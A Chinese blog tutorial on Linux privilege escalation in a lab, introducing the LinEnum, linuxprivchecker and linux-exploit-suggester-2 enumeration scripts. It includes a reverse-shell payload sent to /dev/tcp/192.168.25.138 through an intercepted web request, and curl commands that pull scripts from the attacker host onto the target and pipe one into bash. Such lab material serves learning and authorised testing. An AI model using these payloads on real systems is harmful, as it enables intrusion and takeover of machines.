当前位置: 首页 > news >正文

Linux提权之提权脚本应用(十二)

首先实验环境还是一样的 这里不再多说

第一个脚本 LinEnum

LinEnum 是一个用 Shell 脚本编写的、强大且全面的 Linux 枚举脚本,旨在帮助系统管理员和安全研究人员进行快速的系统审计与漏洞评估,通过执行一系列详细检查任务,提供对操作系统状态的深入洞察,以识别可能的安全风险。它兼容大多数 Linux 发行版,主要功能如下:


 

  • 系统信息收集:获取内核版本、发行版信息、主机名、网络配置等。
  • 用户信息检查:列出所有用户及其权限、密码策略、历史记录等,并检测敏感文件的可访问性。
  • 特权访问审查:检查 sudo 权限,发现无需密码即可提升权限的情况。
  • 环境变量展示:展示 $PATH 和环境变量信息。
  • 服务与进程监控:监控网络连接、运行中的进程及其权限,以及定时任务设置。
  • 版本信息报告:报告 Sudo、MySQL、Postgres、Apache 等关键软件的版本。
  • 默认或弱凭证检测:检测数据库中可能存在的默认或弱密码。
  • 搜索与枚举:查找 SUID/SGID 文件、世界可写的文件、配置文件、日志文件,以及 NFS 服务器信息等。


 

此外,它还提供实验性的导出功能,可将报告保存到指定位置,便于后续分析,适用于系统维护、渗透测试、事故响应等场景。 其使用较为便捷,只需一行命令即可运行,还提供多个选项定制扫描范围,支持针对特定关键字进行文件搜索,定制化程度高,生成的报告包含详尽的系统信息,便于理解和分析,且作者会不断更新和改进,以应对新的威胁。

想了解更多 请看这几篇文章

LinEnum 使用教程-CSDN博客

这个是 这个脚本的下载地址

https://github.com/rebootuser/LinEnum

首先我们先获取bash shell

还是老样子bp 抓包

修改

system('bash%20-c%20"bash%20-i%20>%26%20/dev/tcp/192.168.25.138/8888%200>%261"');

获取反弹shell

然后我们 要下载辅助脚本

新建窗口 我们在kail本机上

git clone https://github.com/rebootuser/LinEnum.git

然后在开启 80 端口服务

我们在刚才获取的shell里输入

先下载

curl http://192.168.25.138/LinEnum/LinEnum.sh -o /tmp/LinEnum.sh

然后我们再执行

但是 因为我们没有执行权限

所以哦我们输入

chmod +x LinEnum.sh

或者我们直接输入

当然前提必须要有执行权限

curl http://192.168.25.138/LinEnum/LinEnum.sh -o /tmp/LinEnum.sh | bash

然后脚本就会自动执行 输出所有的信息

想了解全部信息 请看这篇文章

https://zhuanlan.zhihu.com/p/315052950

如果我们这样看的不方便 我们可以把生成大的 导出到一个文件里i

./LinEnum.sh > 1.txt

生成好之后 我们可以查看 文件 内容

cat 1.txt

第二个脚本

Linuxprivchecker

Linuxprivchecker 是一款用于在 Linux 系统上进行权限提升检查的工具,以下为你详细介绍:

概述


 

它本质上是一个用 Python 编写的脚本,旨在帮助系统管理员、安全审计人员以及渗透测试人员识别 Linux 系统中可能存在的可用于权限提升的漏洞和配置弱点。通过运行该脚本,用户可以全面了解系统的安全状况,发现潜在的安全风险,进而采取相应的措施来加固系统。

功能特点


 

  1. 系统信息收集:它会收集一系列系统的关键信息,包括内核版本、操作系统发行版、安装的软件包等。不同版本的内核和软件可能存在已知的漏洞,这些信息有助于识别可能受影响的组件。
  2. 用户和权限检查:检查当前用户的权限设置,查找可以绕过正常权限限制的途径。例如,查看用户是否拥有 sudo 权限以及 sudo 的配置是否存在漏洞,若存在配置不当,普通用户可能无需密码或拥有过高的权限来执行特定命令,从而实现权限提升。
  3. 文件和目录权限分析:扫描系统中的文件和目录,寻找具有特殊权限(如 SUID、SGID)的文件。具有 SUID 权限的程序在执行时会以文件所有者的身份运行,如果这类程序存在漏洞,攻击者就可能利用它来提升权限。
  4. 服务和进程检查:识别正在运行的服务和进程,检查它们是否存在安全漏洞或配置错误。例如,某些服务可能以高权限运行,并且存在可被利用的漏洞,攻击者可以通过这些漏洞来提升自己在系统中的权限。
  5. 环境变量检查:分析系统的环境变量设置,查看是否存在可能被利用来执行恶意代码的配置。例如,PATH环境变量中包含不安全的目录,可能会导致系统执行恶意程序。

使用方法


 

通常,你只需要从 GitHub 等代码托管平台下载 Linuxprivchecker 脚本,然后在目标 Linux 系统上运行该脚本,即可开始进行权限提升检查。脚本会输出详细的检查结果,列出发现的潜在风险和可能的利用途径。示例命令如下:


 

收起

bash

python linuxprivchecker.py

注意事项


 

  • 合法性:在使用该工具时,必须确保你已经获得了目标系统所有者的明确授权。未经授权对他人系统进行扫描和测试属于违法行为。
  • 更新问题:由于安全漏洞和利用技术不断发展,建议定期更新 Linuxprivchecker 脚本,以确保能够检测到最新的安全风险。

想过多了解 请看下边

推荐项目:Linuxprivchecker.py——Linux权限提升检查脚本-CSDN博客

这个是 python2 版本的 (在python3 不稳定)

https://github.com/sleventyeleven/linuxprivchecker

这个是python3版本的(现在的 一般都用这个版本)

https://github.com/swarley7/linuxprivchecker

在我们的kail机上

新建窗口输入

git clone https://github.com/swarley7/linuxprivchecker.git

首先还是下载到目标机器上

curl http://192.168.25.138/linuxprivchecker/linuxprivchecker.py -o /tmp/linuxprivchecker.py

然后我们用python3执行

python3 linuxprivchecker.py

还是会出来各种信息

第三种工具

linux-exploit-suggester2(针对内核)

linux-exploit-suggester2 是一款用于 Linux 系统的漏洞利用建议工具,下面从多个方面为你详细介绍:

工具概述


 

linux-exploit-suggester2linux-exploit-suggester 的改进版本,它通过分析目标 Linux 系统的内核版本、已安装的软件包等信息,来识别系统中可能存在的可利用漏洞,并提供相应的漏洞利用建议。其目的是帮助安全研究人员、渗透测试人员和系统管理员快速发现系统的安全隐患,以便及时采取修复措施。

主要功能


 

  • 内核漏洞检测:能够根据系统的内核版本,识别已知的内核漏洞。内核是操作系统的核心部分,一旦内核存在漏洞,攻击者就有可能获得系统的最高权限。
  • 软件包漏洞分析:检查系统中已安装的软件包,判断是否存在已知的安全漏洞。许多常见的软件,如数据库管理系统、Web 服务器等,都可能存在可被利用的漏洞。
  • 提供利用建议:针对检测到的漏洞,该工具会提供相应的漏洞利用建议,包括利用的方法、可能需要的工具以及参考的漏洞信息。

使用方法


 

  1. 下载工具:可以从 GitHub 上下载 linux-exploit-suggester2 的脚本文件。


 

收起

bash

git clone https://github.com/jondonas/linux-exploit-suggester-2.git
cd linux-exploit-suggester-2


 

  1. 收集系统信息:在目标 Linux 系统上运行脚本之前,需要先收集系统的相关信息,如内核版本、已安装的软件包等。可以通过以下命令将信息保存到一个文件中:


 

收起

bash

uname -a
dpkg -l > packages.txt  # 对于 Debian 或 Ubuntu 系统
rpm -qa > packages.txt  # 对于 Red Hat 或 CentOS 系统


 

  1. 运行工具:将收集到的信息文件提供给 linux-exploit-suggester2 脚本进行分析。


 

收起

bash

python les2.py --kernel $(uname -r) --packages packages.txt

注意事项


 

  • 合法性:使用该工具进行漏洞检测时,必须获得目标系统所有者的授权。未经授权的漏洞扫描和利用行为可能违反法律法规。
  • 局限性linux-exploit-suggester2 只能检测已知的漏洞,对于未知的零日漏洞无法进行检测。而且,它提供的利用建议并不一定都能在实际环境中成功利用,需要根据具体情况进行评估和测试。

下载地址

https://github.com/jondonas/linux-exploit-suggester-2

还是老样子 先下载到我们的kail机上

git clone https://github.com/jondonas/linux-exploit-suggester-2.git

然后在下载到我们的目标主机上

curl http://192.168.25.138/linux-exploit-suggester-2-master/linux-exploit-suggester-2.pl -o /tmp/linux-exploit-suggester-2.pl

然后我们输入

perl linux-exploit-suggester-2.pl

这里的意思是没有exp

那我们就换一台哦主机

这里我分享给大家

通过网盘分享的文件:Ubuntu.zip

链接: 百度网盘 请输入提取码 提取码: vugf

--来自百度网盘超级会员v3的分享

这里就有 exp

我点击进去查看

具体的用法 就像exp所说 很简单

我们也可以输入

-k 指定版本

perl linux-exploit-suggester-2.pl -k 3.0

相关文章:

  • halcon三维点云数据处理(二十五)moments_object_model_3d
  • 【qt链接mysql】
  • Android 轻量级双向 IPC 通信 Messenger
  • 前端项目打包过滤指定icon文件
  • 100天精通Python(爬虫篇)——第113天:爬虫基础模块之urllib详细教程大全
  • OpenCV(8):图像直方图
  • 【备赛】在keil5里面创建新文件的方法+添加lcd驱动
  • https和http有什么区别
  • VMware 与 CentOS 安装指南
  • Spring Core面试题
  • P1038 [NOIP 2003 提高组] 神经网络
  • 数据结构——静态顺序表,动态顺序表
  • 三维重建_点云重建方法及开源框架推荐
  • 基于 IMX6ULL 的环境监测自主调控系统
  • 网络安全-php安全知识点
  • 下载安装umamba教程使用命令
  • 2024 nginx已知 sztu.edu.cn.key和sztu.edu.cn.pem配置ssl
  • AIGC技术助力空军招飞,近屿智能开启智能人才培育新征程
  • Docker 搭建 Nginx 服务器
  • w227springboot旅游管理系统设计与实现
  • 河南:响鼓重锤对违规吃喝问题露头就打、反复敲打、人人喊打
  • 南京江宁区市监局通报:盒马一批次猕猴桃检出膨大剂超标
  • 青海省交通运输厅副厅长田明有接受审查调查
  • 万科再获深铁集团借款,今年已累计获股东借款近120亿元
  • 紫光集团原董事长赵伟国一审被判死缓
  • 国务院关税税则委员会关于调整对原产于美国的进口商品加征关税措施的公告